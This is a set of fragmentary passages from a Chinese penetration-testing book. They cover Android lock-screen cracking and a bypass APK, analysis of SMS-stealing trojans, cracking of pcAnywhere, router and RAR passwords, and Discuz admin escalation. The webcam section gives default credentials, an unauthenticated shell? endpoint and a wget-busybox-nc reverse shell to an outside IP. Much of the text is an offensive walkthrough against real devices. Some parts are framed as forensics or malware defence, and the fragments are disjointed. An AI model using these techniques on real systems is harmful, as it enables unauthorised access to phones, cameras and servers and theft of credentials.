text
stringlengths
64
2.99M
java -jar baksmali-2.0.5.jar -o classout/ classes.dex 使用以上命令的前提是path路径中有Java安装目录下的“bin”文件夹路径,这样才可以在任意路径下使用Java命令,此外要在“classout/”后面加一个空格。 把c:\classes.dex文件反编译为smali文件,输出到c:\classout目录下。
未知 6.2 Android手机屏幕锁解锁技术 随着移动通信技术的发展,手机及智能终端成为人们工作和生活中必不可少的设备,其内置的操作系统能达到类似于计算机的功能,且拥有许多移动通信特有的应用和服务,如微信、移动支付等。
本节将对Android系统的各种屏幕锁的原理进行详细分析,并有针对性地讲解相应的解锁方法。 6.2.1 Android屏幕锁的分类 图6-7 屏幕锁定方式 在Android系统中,屏幕锁定方式包括“无”、“滑动”、“人脸解锁”、“图案”、“PIN”和“密码”6种,如图6-7所示。
本节主要讲解已root Android系统的“图案”、“PIN”、“密码”3种屏幕锁的解锁方法。 6.2.2 图案锁定及解锁 在Android设备上通过图案来锁定屏幕是最为常用的一种安全措施,用户可以通过设置锁定图案对设备的用户界面进行锁定。
图6-8 设置解锁图案 1.图案锁定原理 Android设备的锁定界面由一个3×3矩阵(共9个点)组成,设定图案必须满足两个基本要求:一是图案必须包括至少4个点(Android 2.3.3之前的版本为至少3个点);
Android图案解锁在设备中的存储方式是将图案上的点进行编码,然后将编码通过散列算法SHA1进行加密,最后存储在系统文件夹“data”中,如图6-9所示。 图6-9 图案密码转换存储过程 图6-10 图形编码 图形输入:如图6-10所示,就像设置解锁图案一样在解锁屏幕时输入之前绘制的图案。
编码加密:使用SHA1算法对上述十六进制编码“0003060708”进行计算,得到密文“c8c0 b24a15dc-8bbfd411427973574695230458f0”。
01 获取密文文件 运行“adb pull /data/system/gesture.key gesture.key”命令将密码文件下载到本地,或者运行“adb shell cp /data/system/gesture.key /sdcard/gesture.key”命令将密码文件复制到SD卡中,如图6-11所示。
5个节点的密码个数为15120; 6个节点的密码个数为60480; 7个节点的密码个数为181440; 8个和9个节点的密码个数为362880; 密码总数为985824个。
解锁界面如图6-12所示,左边为密码解锁界面,右边为PIN解锁界面。 图6-12 解锁界面 1.PIN和密码原理 两种解锁方式必须满足以下两个基本要求:输入的字符不能少于4个数字(PIN)、输入的字符不能少于4个且必须包含至少1个字母(密码);
图6-13 密文文件内容 与图案散列加密不同的是,这两种屏幕锁定方式在散列加密时加入了salt值,该值存放在/data/data/com.android.providers.settings/databases/settings.db文件中。 打开SQLite数据库文件settings.db,可以看到secure表中有字段lockscreen.password_salt,该字段的值就是散列加密中用到的salt值。
public byte[] passwordToHash(String password){ if(password == null){ return null; } String algo = null; byte[] hashed = null; try{ byte[] saltedPassword = (password + getSalt()).getBytes(); byte[] sha1 = MessageDigest.getInstance(algo = "SHA-1").digest(saltedPassword); byte[] md5 = MessageDigest.getInstance(algo = "MD5").digest(saltedPassword); hashed = (toHex(sha1) + toHex(md5)).getBytes(); }catch(Exception e){ Log.w(TAG, "Failed to encode string because of missing algorithm:" + algo); } return hashed; 具体的转换方式为:将输入的密码和salt值拼接,分别进行SHA1散列和MD5散列,将40字节的SHA1散列和32字节的MD5散列拼接后存储在password.key文件中。
1.锁定清除 当密码比较复杂,在短时间内无法解锁,并且取证工作对于手机某些文件夹中的文件没有完整性要求时,可以通过删除或替换/data/system文件夹中的对应密文存储文件gesture.key或password.key达到解除屏幕锁定的目的。 删除了对应密文存储文件之后,使用任意密码都能解锁屏幕; 替换了对应密文存储文件之后,使用替换密文对应的解锁方式就能解锁屏幕。
2.锁定绕过 Android系统通过KeyguardLock类控制锁屏服务的开启和关闭。 调用该类的方法disableKeyguard可以关闭锁屏服务,从而达到不输入密码就绕过锁屏界面的目的,示例如下。 KeyguardManager manage = (KeyguardManager)getSystemService(KEYGUARD_SERVICE); //获取当前屏幕状态 If(manage.inKeyguardRestrictedInputMode()){ KeyguardLock keyguard = manage.newKeyguardLock(getLocalClassName()); Keyguard. disableKeyguard (); } //如果处于锁定状态,通过disableKeyguard函数绕过锁定 将以上代码编译成开机自启动的APK程序,安装到被锁定的手机上,重启之后将不再显示锁屏界面,而是直接进入系统。 3.JTAG接口 要想在没有被root的Android智能终端上获取相应的解锁信息,需要先使用JTAG接口将手机内存芯片中的数据dump到本地计算机,然后找出对应的密文文件gesture.key和password.key,并通过关键字找出lockscreen.password_salt的值,最后就可以使用6.2.3节介绍的方法解锁了。
未知 6.3 钓鱼网站APK数据解密与分析 目前,以“积分兑换”名义兴起的钓鱼网站横行于互联网,多数网民曾收到这类诱骗登录后安装手机木马的钓鱼短信,而手机一旦被植入木马将很难删除。木马会窃取手机用户的大量个人隐私,并通过短信广播对手机通讯录中的所有联系人群发钓鱼短信,以扩大感染面积。保守估计,2015年网民通过各类钓鱼短信及诈骗短信损失的金额约百亿元。 猎豹安全实验室的云端监控数据显示,某月截获的“短信拦截”类样本变种数量超过10万个,影响用户数达数百万。短信拦截木马作为安卓手机病毒的一类常见样本,近年来显现出爆发增长的趋势,其背后的黑色产业链也日益发展壮大,短信拦截木马的日趋泛滥已经成为移动支付、网银财产等环节的重点安全问题。 6.3.1 收集手机木马文件 收集手机木马文件的步骤如下。 01 收集欺诈网站地址 在日常生活中,我们经常会收到“10086”号码发送的短信通知,告知用户进行积分兑奖,然后给出一个短链接地址或者正常的网站地址,单击该地址会要求用户输入银行卡密码、手机号码、银行卡号、姓名等敏感信息,同时还会要求用户下载apk文件。例如,在某短信中提及的网站“l0086wrd.cc”明显不是10086的官方网站,而是典型的10086移动积分兑换网站。用户在登录网站的过程中输入银行卡信息,完成后跳转到木马下载页面,如图6-14所示。 02 下载并反编译手机apk木马文件 将下载的apk木马文件解压,可以找到存放主要数据的文件classes.dex。下载baksmali.jar文件,下载链接为https://github.com/JesusFreke/smali。执行反编译命令“java -jar baksmali.jar -o /root/output”,将dex文件提取至output目录,然后分析该木马的行为,大致流程如图6-15所示。 图6-14 要求用户下载手机apk木马文件 图6-15 短信拦截木马的工作流程 6.3.2 分析手机木马程序 下面我们分析一下这个木马程序。 1.获取邮箱账号 查看Java源代码。从前面的流程中我们分析出该短信拦截木马的主要数据渠道为电子邮件,所以木马的数据文件中一定保存着接收手机信息的邮箱账号和密码。在其代码中,我们果然找到了如图6-16所示的代码。 图6-16 获取邮箱账号 2.获取更多信息 通过对文本内容的检索,定位到“com/phone/db/a.smali”文件。该文件中保存着木马控制者的收信信息。同时我们也了解到,该木马存在授权时间,因此可知该木马为商业用途的木马。 分析a.smali文件,得到该木马控制者控制端的手机号、邮箱账户、邮箱密码等信息。 通过得到的信息登录邮箱,可以查看邮箱中存放的大量被害用户的短信内容,如图6-17所示。 图6-17 进入邮箱 6.3.3 编写自动提取木马敏感信息的程序 下面介绍如何编写一个自动提取木马敏感信息的程序。 1.自动提取账号和密码的思路 既然我们已经知道了保存key的文件路径,那么编写一个自动提取账号和密码的脚本就可以实现批量解密。利用Python编写自动提取账号和密码的脚本,思路如下。 01 利用baksmali.jar直接将dex文件数据提取出来(前提是已配置好JDK环境)。 02 定位apk账号和密码的路径(为了演示方便,笔者没有采用遍历目录查找文件内容的方式,有兴趣的读者可以自行尝试)。 03 通过Python的OS库控制Shell执行系统命令。在本例中没有进行容错处理,默认操作系统为Linux。 04 完善输出信息。保存提取的信息,并自定义数据存储目录。 主要函数如图6-18所示。 2.运行脚本 脚本编写很简单,并未进行过多的容错处理。这里的思路只是提取同类型(如“10086”)的短信拦截木马内容。但是目前除了短信拦截木马,还有其他类型的Android手机木马,该类木马存储收信账号和密码的文件路径并不固定,所以需要对文件夹中文件的内容进行查找。 我们找到另一个“10086”积分钓鱼网站测试一下脚本的运行情况。运行命令“python unkey.py 10086.apk”,成功输出信息,如图6-19 所示。 图6-18 主要函数 图6-19 测试脚本 3.查看结果 账号和密码从脚本中成功提取出来,日志信息保存在本地目录的10086.txt文件中,如图6-20所示。 图6-20 查看提取结果
未知 6.4 对一款手机木马的分析 随着智能手机的普及,网络安全离我们不再遥远,智能硬件漏洞、淘宝刷单等已经开始影响我们的生活,这也要求我们必须具有安全意识和安全常识。
短信诈骗、冒充公检法机关欺诈、冒充家长转账的新闻常常见诸报端,其实这些手段并不高明——在收到这类信息后,冷静下来,仔细思考,认真核对,就能避免上当。
6.4.1 对手机短信进行分析 在收到手机短信后,应当冷静地对其进行分析,步骤如下。 01 分析短信内容 在微信朋友圈中,笔者看到一位朋友发了一幅截图,如图6-21所示。
短信是陌生用户发送的,而非是好友或者学校老师发送的。 短信内容明显与学校发送的正常短信内容有异。 目前,很多学校会通过微信群发送通知,而使用短信发送通知的比较少。 短信中涉及短地址,而学校一般不会发送短地址。
02 还原链接地址 通过百度搜索到一个还原短地址的网站,如图6-22所示,在其中输入短信中提及的链接地址“t.cn/RGHX9m1”,将其还原为真实地址“http://link.zhihu.com/?target= http%3A//172.246.236.186:8080/3446/ziliaoRV.apk”,再变换一下,结果为“http:// link.zhihu.com/?target=http://172.246.236.186:8080/3446/ziliaoRV.apk”。 图6-22 还原短地址为真实地址 该短信的真实目的是诱导手机用户下载文件“http://172.246.236.186:8080/3446/ ziliaoRV.apk”。
03 获取apk程序 在浏览器地址栏中输入获取的地址“http://172.246.236.186:8080/3446/ziliaoRV.apk”进行下载,如图6-23所示,显示该文件已经被移除了。
我们通过猜测和扫描,获取了2套apk程序,分别是http://172.246.236.186:8080/0983/ziliao.apk和http://172.246.236.186:8080/1966/ziliao.apk。
将程序下载到本地后,360安全卫士立即报警,显示该手机文件存在恶意行为,直接对其进行了隔离,如图6-26所示。 图6-25 下载并获取程序 图6-26 360安全卫士查杀apk程序 至此可以肯定,该短信存在问题,通过诱导手机用户下载apk,完全控制用户的手机,这就是我们经常听说的手机木马。 6.4.2 对APK进行反编译和追踪 获得可疑短信背后的手机木马后,我们就可以对该apk文件进行反编译,并对其行为进行追踪了。 1.反编译apk程序 反编译apk程序的步骤如下。 01 反编译程序 使用dex2jar 0.0.9.15对ziliao.apk文件进行反编译。 将ziliao.apk解压到本地,将“ziliao”文件夹中的classes.dex文件复制到“dex2jar-0.0.9.15”文件夹下,执行命令“dex2jar.bat classes.dex”进行反编译,但出现了错误,如图6-27所示。 图6-27 反编译失败 技巧 (1)可以直接将classes.dex文件拖动到dex2jar.bat文件上,程序会自动生成classes_dex2jar.jar文件,如图6-28所示。 图6-28 反编译程序成功 (2)可以使用“d2j-dex2jar.bat classes.dex”命令进行反编译。
03 登录邮箱并查看邮件内容 使用获取的邮箱账号和密码登录邮件服务器,如图6-30所示,该邮箱收到了14封邮件,邮件内容主要是挂马手机的通讯录和短信等信息。 图6-29 获取邮箱及其密码 图6-30 查看邮件内容 该apk程序会将受害者手机中的通讯录信息全部上传,这就解释了匿名者发送短信时是如何获取家长真实姓名的。 2.追踪apk程序 单击标题为“全部短信(68510027902492)”的邮件,该邮件的发件人为“a13145771966”,其邮箱“a13145771966@sina.com”就是apk指定的邮箱地址,如图6-31所示。 图6-31 追踪邮件内容 安装了该apk程序的用户会自动将其手机中的全部短信发送到a13145771966 @sina.com这个邮箱中。
该木马控制手机后,可以直接进行银行转账,如图6-32所示。 图6-32 实施银行转账 6.4.3 手机APK安全防范 手机APK程序类似于Windows程序,手机木马类似于Windows木马。
1.涉及敏感信息的手机要独立使用 为了保证手机交易的安全,在需要使用各种“宝宝”(如支付宝)进行支付的手机,以及绑定银行卡的手机上,一定不要安装来历不明的APK程序,甚至最好不要安装其他APK程序,连手机游戏都不要安装(目前,很多黑产已经盯上正规的APK程序,能够修改或者绑定手机木马到正常的APK程序中,手机游戏是“重灾区”)。
4.使用计算机下载APK程序并进行病毒查杀 通过计算机下载APK程序,并使用计算机的杀毒软件进行查杀。 一般的杀毒软件都能识别该APK是否为恶意程序。 此外,可以通过APK程序的大小进行判断,通常木马程序APK的体积小于2MB。
未知 第7章 其他类型密码的获取与破解 在前面几章种讨论了操作系统、数据库、邮件、无线密码及APK密码获取与破解方面的内容,在网络渗透过程中还会涉及很多有关密码获取与破解的知识,如Rar文件解密、Word密码加密与解密等。在本章中主要介绍涉及密码获取与破解的“杂项”,也即一些偏门的密码获取与破解,掌握这些知识点将有助于后续渗透或者目标网络的控制。 本章主要内容 pcAnywhere账号和口令的破解 使用Router Scan扫描路由器密码 使用ZoomEye渗透网络摄像头 Discuz!管理员复制提权技术 RAR加密文件的破解 一句话密码破解获取某网站WebShell 使用Burp Suite破解WebShell密码 Radmin远控口令攻防全攻略 通过扫描Tomcat口令渗透Linux服务器 VNC认证口令绕过漏洞攻击 Serv-U密码破解 使用Cain嗅探FTP密码 利用Tomcat的用户名和密码构建后门 破解静态加密软件 Word文件的加密与解密 Citrix密码绕过漏洞引发的渗透 从渗透扫描到路由器跳板攻击 手工检测“中国菜刀”是否包含后门 FlashFXP密码的获取 未知 7.1 pcAnywhere账号和口令的破解 通过一些攻击方法和手段取得了远程计算机的控制权后,可以利用其他远程控制软件查找系统中的CIF文件,通过破解CIF文件获取pcAnywhere的账号和密码,进而通过pcAnywhere客户端对远程主机进行完全控制等操作。pcAnywhere是一款比较流行的远程控制软件,其控制原理与Radmin等远程控制软件类似,需要账号和口令。不同的用户会根据个人喜好选择不同的远程管理软件,在很多情况下,管理员可能使用某一款远程管理软件管理多台计算机,根据其口令进行猜测或者安装键盘嗅探软件获取口令等信息可以渗透其内网和外网计算机。 7.1.1 在本地查看远程计算机是否开放了5631端口 pcAnywhere默认的开放端口为5631。在DOS提示符下输入“sfind -p *.*.*.19”命令查看该IP地址的端口开放情况,结果表明该计算机开放了5631端口,也就是说,该计算机使用pcAnywhere软件作为远程控制软件的服务端,如图7-1所示。 图7-1 查看远程主机是否开放了5631端口 7.1.2 查找pcAnywhere账号和密码文件 通过各种攻击方法和手段成功控制该计算机以后,在其Shell或Telnet中查找pcAnywhere的账号和密码文件。pcAnywhere的账号和密码保存在一个后缀为“.cif”的文件中,在系统目录中输入命令“dir *.cif /s”,查找系统磁盘中的所有CIF文件。在本例中找到两个CIF文件,如图7-2所示,第一个文件是保存pcAnywhere账号和密码的文件,第二个是无用文件。 图7-2 查找pcAnywhere账号和密码文件 7.1.3 将CIF加密文件传输到本地并进行破解 在本例中,使用Radmin的文件传输功能将文件传输到本地,然后通过pcAnywherePWD进行破解。直接运行pcAnywherePWD,在“文件”对话框中选择刚传输回来的CIF文件,单击“解密”按钮,其账号和密码就显示出来了,如图7-3所示。 图7-3 破解pcAnywhere的账号和密码 7.1.4 连接pcAnywhere服务端 pcAnywhere的安装比较简单。安装完毕后,直接运行pcAnywhere软件,在新建连接向导中输入IP地址“*.*.*.19”,并单击“完成”按钮,双击“*.*.*.19”地址所对应的标签,根据网络情况,很快就会出现pcAnywhere的服务端,要求输入用户名和密码,验证正确后可以进行完全控制等操作。如图7-4所示,通过pcAnywhere客户端对pcAnywhere服务端的操作就像对本地计算机操作一样方便。 图7-4 连接pcAnywhere服务端 注意 (1)通过pcAnywhere远程控制他人计算机时,该远程控制软件在完全控制模式下鼠标和屏幕是同步的,也就是说,如果用户正在使用远程肉机,那么他会感觉到有人在操作其鼠标和屏幕。所以,远程控制时攻击者的操作速度很快,且会选择用户没有使用该计算机(肉机)时进行操作。 (2)攻击者拥有远程计算机(肉机)的pcAnywhere账号和口令后,如果用户没有更改用户名和密码,则相当于拥有一个不被查杀的后门。
未知 7.2 使用Router Scan扫描路由器密码 Router Scan是一款路由器安全测试工具,可以指定IP地址段对路由器进行暴力破解等安全测试,支持TP-LINK、Huawei、Belkin、D-Link等各大品牌型号的路由器。Router Scan是俄罗斯安全人员开发的一套安全测试工具,目前已经对源代码进行开源,最新版本为2.47,官方网站地址为http://stascorp.com/load/1-1-0-56。该软件善于寻找和确定不同的设备,发现大量已知的路由器或服务器,最重要的是,能把其中有用的信息扫描出来,且使用过程非常简单。 7.2.1 运行Router Scan 2.47 Router Scan 2.47有汉化版本,不过有些版本的杀毒软件会提示其携带病毒,所以最好到官方站点下载。Router Scan是免安装软件,直接运行可执行程序RouterScan.exe即可,其界面如图7-5所示。Router Scan 2.47在Router Scan 2.44的基础上做了一些改动,可以编辑扫描IP地址范围、自动保存结果,并增加了一些扫描模块。 图7-5 运行Router Scan程序 7.2.2 设置Router Scan扫描参数 下面介绍Router Scan扫描参数的设置。 1.设置扫描端口 在Router Scan中,一共有6个地方需要设置参数,最大线程使用默认值(100)即可,超时也不用修改。在“Scan ports”(端口扫描)设置区单击“+”按钮,可以增加自定义路由器扫描端口,这对修改默认路由器端口为其他端口的扫描特别有用。如图7-6所示,在弹出的对话框中输入数字端口号即可,如“443”表示对“443”端口进行扫描并破解。 图7-6 增加扫描端口 2.设置扫描IP地址的范围 在“Enter IP ranges to scan”(IP地址扫描范围)设置区单击“+”按钮可以增加待扫描IP地址,也可以通过修改ranges.txt文件的内容进行扫描,如扫描IP地址段124.205.0.1~124.205.255.255,表示扫描“124.205”的B段,如图7-7所示,也可以扫描某一个IP地址。另外,可以单击“E”按钮,直接编辑扫描范围,以便对地址段进行编辑和扫描,如图7-8所示。 图7-7 设置扫描IP地址的范围 图7-8 对IP地址段进行编辑 3.设置其他参数 如图7-9所示,默认自动保存扫描结果,可设置扫描代理服务器等信息。单击“Start scan”按钮开始扫描,扫描结果会在“Realtime Stats”标签页中实时显示。 4.自定义字典 在扫描软件目录中打开auth_basic.txt文件,如图7-10所示,添加账号和密码,账号和密码用空格隔开,可以使用“//”进行注释,以便维护字典。 图7-9 设置其他参数 图7-10 增加字典 7.2.3 查看并分析扫描结果 在Router Scan中提供了扫描状态和结果显示,如图7-11所示,状态和结果都在软件的下方,可以通过“Realtime Stats”、“Good Results”和“Search Results”标签页查看。对扫描的结果,可以选中目标,右键单击直接访问有结果的目标,如图7-12所示。 图7-11 查看扫描结果 图7-12 访问被破解站点
未知 7.3 使用ZoomEye渗透网络摄像头 网络摄像头(IP Camera)在日常生活中越来越普及,常用于交通路口抓取车牌号码、公共场所安全监控、停车场车牌号码识别等。
这些摄像头会与计算机或者摄像机等硬件设备连接,以便进行图像的存储和回访。 现在很多摄像头直接与网络连接,以方便用户通过浏览器或客户端进行连接、管理和查看。 原本使用摄像头的目的是方便查看,但由于一些厂商对安全的重视程度不够,致使黑客通过技术手段可以方便地对存在漏洞的网络摄像头进行控制,在有些情况下,还可以获取网络摄像头所在服务器的权限,甚至渗透该摄像头所在的网络,危害非常大。
7.3.1 摄像头常见漏洞分析 Andrew Tierney在其博客上公布了一篇有关摄像头漏洞利用的文章(https://www. pentestpartners.com/blog/pwning-cctv-cameras/),文章的核心内容归纳如下。 1.弱口令漏洞 多款网络摄像头都发现了弱口令漏洞,举例如下。
Mvpower 8 Channel Security DVR(国内用户称之为“CCTV网络摄像头”):用户名为“admin”,密码为空。 海康威视IP网络摄像机:超级用户“admin”,密码“12345”。 大华网络摄像机:用户名“admin”,密码“888888”。 天地伟业网络摄像机:用户名“Admin”,密码“111111”。
2.登录密码绕过漏洞 对之前使用默认密码成功登录的页面进行抓包,找到处理页面登录逻辑的JS代码。 对处理页面登录的逻辑进行分析,发现存在登录绕过漏洞,代码如下。 $(document).ready(function(){ dvr_camcnt = Cookies.get("dvr_camcnt"); iSetAble = Cookies.get("iSetAble"); iPlayBack = Cookies.get("iPlayBack"); dvr_usr = Cookies.get("dvr_usr"); dvr_pwd = Cookies.get("dvr_pwd"); if(iSetAble == '0'){ $('#pb_settings').css('display','none'); } if(iPlayBack == '0'){ $('#pb_review').css('display','none'); } if(dvr_camcnt == null || dvr_usr == null || dvr_pwd == null) { location.href = "/index.html"; } 系统管理页面直接通过JS程序检查cookie是否为空来判断用户是否已经登录——现在竟然还有程序员这样编写判断登录状态的代码,安全性实在太低了。
通过代码可以看出,需要伪造3个cookie值,分别是dvr_camcnt、dvr_usr=admin和dvr_pwd=123。 直接打开http://xx.xx.xx.xx/view2.html页面并抓包,发现系统会自动设置该cookie参数的值。
图7-13 密码绕过漏洞 3.直接获取WebShell及其root密码 直接访问页面http://www.antian365.com/shell?cat/etc/passwd,即可获取服务器root账号的密码,如图7-14所示。
cd /root/rec/a1 && wget http://212.111.43.161/busybox &&chmod +x busybox&& ./busybox nc 122.115.47.39 8000 -e /bin/sh -e /bin/sh 还可以执行命令“http://www.antian365.com/shell?/usr/sbin/telnetd -l/bin/sh -p 25”,通过远程登录目标IP地址的方法直接进入系统。
7.3.2 实战演练 通过7.3.1节的漏洞分析,我们可以对存在漏洞的网络摄像头进行实际漏洞测试,以验证漏洞的真实性,并掌握漏洞的利用方法。
1.确定网络摄像头的关键字 在Kali Linux中打开banner-grab,填写设备的IP地址和Web端口号,抓取结果如图7-15所示,其中关键字为“Server”后的字符串“JAWS”。
图7-15 获取关键字 2.快速获取存在的目标服务器 可以使用ZoomEye进行检索,输入地址“https://www.zoomeye.org/search?q=JAWS”直接进行查询。
图7-17 获得访问权限 4.直接获取访问密码 使用命令“shell?cat%20/tmp/usrm.ini”可以直接获取访问密码。 访问http:// 210.21.34.206/shell?cat%20/tmp/usrm.ini,可以知道默认管理员密码为空,如图7-18所示。 将默认密码进行修改,然后重新访问,其密码已经被明文写入/tmp/usrm.ini文件,如图7-19所示。
图7-18 直接获取管理员密码 图7-19 修改后的密码以明文保存 5.获取无线网络的密码 在该网络摄像头的“设置”页面可以直接获取其无线AP的名称及密码,如图7-20所示。
参考文章 http://www.freebuf.com/tools/5950.html http://www.ijiandao.com/safe/cto/5450.html http://www.myhack58.com/Article/html/3/8/2015/64210.htm http://hb.ifeng.com/3c/detail_2014_04/04/2083399_0.shtml http://security.zol.com.cn/443/4439365_all.html http://bobao.360.cn/news/detail/1388.html http://www.myhack58.com/Article/html/2/5/2015/58087.htm http://drops.wooyun.org/category/papers
未知 7.4 Discuz! 管理员复制提权技术 使用Discuz! 建设论坛方便、快捷,不仅能够满足功能需求,而且安全性在同类软件中是最高的,因此深受广大用户的喜爱。
在得到WebShell的情况下,通过本节讨论的技术可以很容易地进行查看管理员信息、修改论坛设置、备份数据库等操作,还可以让普通用户获得管理员权限。
数据库:MySQL 5.1 MySQL数据库客户端管理软件:MySQL-Front Discuz! 7.0(下载地址:http://download.comsenz.com/Discuz) 7.4.1 Discuz! 论坛的加密方式 Discuz! 6.X及之后的Discuz! 7.0都采用MD5多重加密,其加密函数有checkmd5和authcode。
function checkmd5($md5, $verified, $salt = '') { if(md5($md5.$salt) == $verified) { $result = !empty($salt) ? 1 : 2; } elseif(empty($salt)) { $result = $md5 == $verified ? 3 : ((strlen($verified) == 16 && substr($md5, 8, 16) == $verified) ? 4 : 0); } else { $result = 0; } return $result; } 以上代码主要度对密码进行检测,有3个参数,分别是“@param string $md5”、“@param string $verified”、“@param string $salt”。
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key ? $key : $GLOBALS['discuz_auth_key']); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr (md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) &amp;&amp; substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } 以上代码主要用来加密或者解密用户信息,其参数的意义如下。
7.4.2 使用MySQL-Front管理MySQL数据库 下面讨论使用MySQL-Front管理MySQL数据库的相关内容。 1.设置MySQL-Front MySQL-Front是一款MySQL客户端管理软件,可以对MySQL数据库实现图形界面管理,软件下载地址为http://www.mysqlfront.de/download.html。 安装MySQL-Front后直接运行,如图7-21所示。
2.连接MySQL数据库 在“打开登录信息”窗口选择刚才设置的MySQL数据并打开,如图7-22所示,在MySQL-Front中常用的4个按钮为“对象浏览器”、“数据浏览器”、“SQL编辑器”和“图表”。
“对象浏览器”按钮主要用来浏览有哪些表,“数据浏览器”按钮主要用来查看选中数据库的表中的数据,“SQL编辑器”按钮主要用来执行SQL语句,“图表”按钮主要用来与“对象浏览器”按钮进行切换。
如图7-24所示,在本例中为“antian_ members”,该表中保存的是用户注册的信息,单击“数据浏览器”按钮,可以看到该用户的一些详细注册信息。 图7-24 查看选定用户的详细注册信息 3.修改普通用户为管理员用户 在antian_members表中将用户“cxb”的“adminid”值由“0”修改为“1”,将“groupid”的值由“12”修改为“1”,然后单击发布按钮使修改生效,至此已经将普通用户“cxb”变成管理员用户。 在登录的网页中刷新一下,再次查看用户个人信息,如图7-25所示,用户“cxb”的用户组已经升级为“Administrator”,可以行使管理员权限了。
图7-25 普通用户已经升级为管理员 7.4.4 管理员密码丢失解决方案 如果管理员将密码丢失,会造成很多严重的问题,下面给出管理员密码丢失的解决方案。
1.修改管理员密码为已知用户密码 使用MySQL-Front打开myuc_members表后,单击工具条下面的“数据浏览器”按钮,查看myuc_members表中的数据,如图7-26所示,先将用户“admin”的“password”值复制到本地进行备份,以备出现错误后进行恢复。
图7-26 修改管理员密码为已知用户密码 2.修改salt 在Discuz! 论坛中,用户的密码不是普通的加密,而是经过变异的加密,因此还需要保证管理员的密码与已知用户的salt一致。
一共有7个安全提问,用户注册成功后可以在个人中心的“密码和安全问题”中进行设置,每一个安全提问根据答案生成一串8位的加密字符串,密码不同,安全字符串也不同。
因此,如果要让管理员用户使用普通用户的安全提问,则需要将管理员的“secques”设置成普通用户的“secques”,反之,则需要将普通用户的“secques”设置成管理员的“secques”。 如图7-29所示,将已知用户的“secques”替换管理员的“secques”,然后使用普通用户的安全提问代替管理员的安全提问进行登录。 图7-28 安全提问 图7-29 修改安全提问secques值 至此,有关Discuz! 论坛管理员与普通用户之间的身份转换已经完成,使用修改后的密码和问题答案即可登录。 登录后,用户身份为管理员,如图7-30所示,可以对论坛系统进行管理。 图7-30 登录后台进行管理 7.4.5 小结与探讨 本节探讨了Discuz!论坛的加密方法,通过实际案例讲解了如何通过操作MySQL数据库来更改用户身份,即通过修改普通用户的adminid、groupid、secques和password的值,可以使“普通用户”变成“管理员”,行使管理员权限。
同时,该方法也适用于管理员丢失或者忘记了管理密码的情况。 通过该方法可以重新设置密码,并行使管理员权限。 写完本节内容后,笔者又发现该管理员密码可以直接使用PasswordPro进行破解,由于篇幅关系就不在本节进行探讨了。
关于Discuz!论坛的安全问题还有很多话题,如通过脚本来嗅探或者记录用户名和密码。 在Discuz!论坛数据库中,用户密码字段生成的是密文,网上也有一些脚本可以直接用来记录用户的登录密码。
未知 7.5 RAR加密文件的破解 安全意识比较强的人一般都会对文件进行加密,如使用RAR自带的加密功能进行加密。当然,网上也有很多提供资料下载的网站,这些网站中绝大部分文件都是采用RAR加密的方式来保护资料不被未授权人查看的,要想看资料,必须付费获取RAR加密文件的密码。加密不是绝对的,虽然没有什么好的技巧来破解RAR加密文件,但是可以通过字典文件、暴力破解及掩码等方式对RAR加密文件进行破解。网上有很多破解RAR加密文件的软件,笔者感觉最好用的还是Advanced RAR Password Recovery,该软件运行速度快,设置简单。 7.5.1 设置Advanced RAR Password Recovery Advanced RAR Password Recovery(ARPR)是Elcomsoft公司(http://www. elcomsoft.com/)研发的一款破解由WinRAR生成的RAR压缩文件密码的软件,最新版本为3.01。ARPR可以估算破解密码所需要的时间,还可以中断计算和恢复前次计算,其注册版可以解开长达128位的密码,支持可定制的暴力破解及字典破解等。 本案例中使用的是ARPR 1.11汉化版,因此直接运行主程序即可。在主界面中对ARPR进行设置,如图7-31所示,在“优先级选项”设置区选中“后台”单选按钮,并勾选“运行记录到arpr.log”复选框,然后单击“注册”按钮,输入汉化作者提供的注册码进行注册,最后在“语言”下拉列表中选择“简体中文”选项。 图7-31 设置ARPR 1.11 说明 在ARPR 1.11中设置自动保存破解结果,如图7-32所示,选中“保存项目”复选框,并设置自动保存时间,然后设置一个自动保存的目录。 图7-32 自动保存破解结果 7.5.2 使用字典文件进行破解 切换到“选项”标签页,在“攻击类型”设置区选中“字典文件”单选按钮。单击“字典文件”选项卡,选择字典文件,然后单击“开始”按钮进行破解,如图 7-33所示。 图7-33 使用字典文件进行破解 说明 (1)ARPR 1.11只能破解WinRAR 3.5及以下版本的文件。要想破解WinRAR 3.5以上版本的文件,需要使用ARPR 3.0。 (2)使用字典文件进行破解是最快捷的方式,可以知道破解大概需要的时间。 图7-34 破解结果 ARPR 1.11破解结束后会给出一个“找不到密码”的提示,在该提示中会显示“密码总计”、“时间总计”、“平均速度”等信息,如图7-34所示。 说明 ARPR破解RAR文件的密码时,会生成一个破解日志记录。直接访问ARPR 1.11的目录,打开日志文件arpr.log,如图7-35所示,即可查看破解记录。 图7-35 查看破解日志 7.5.3 使用暴力破解方式破解密码 在很多情况下,通过字典文件无法成功破解,这时就需要进行暴力破解。如图7-36所示,在“攻击类型”设置区选中“暴力攻击”单选按钮,在“长度”标签页分别设置最小密码长度为“1”,最大密码长度为“9”,然后单击“开始”按钮进行破解。 图7-36 使用暴力破解方式进行破解 说明 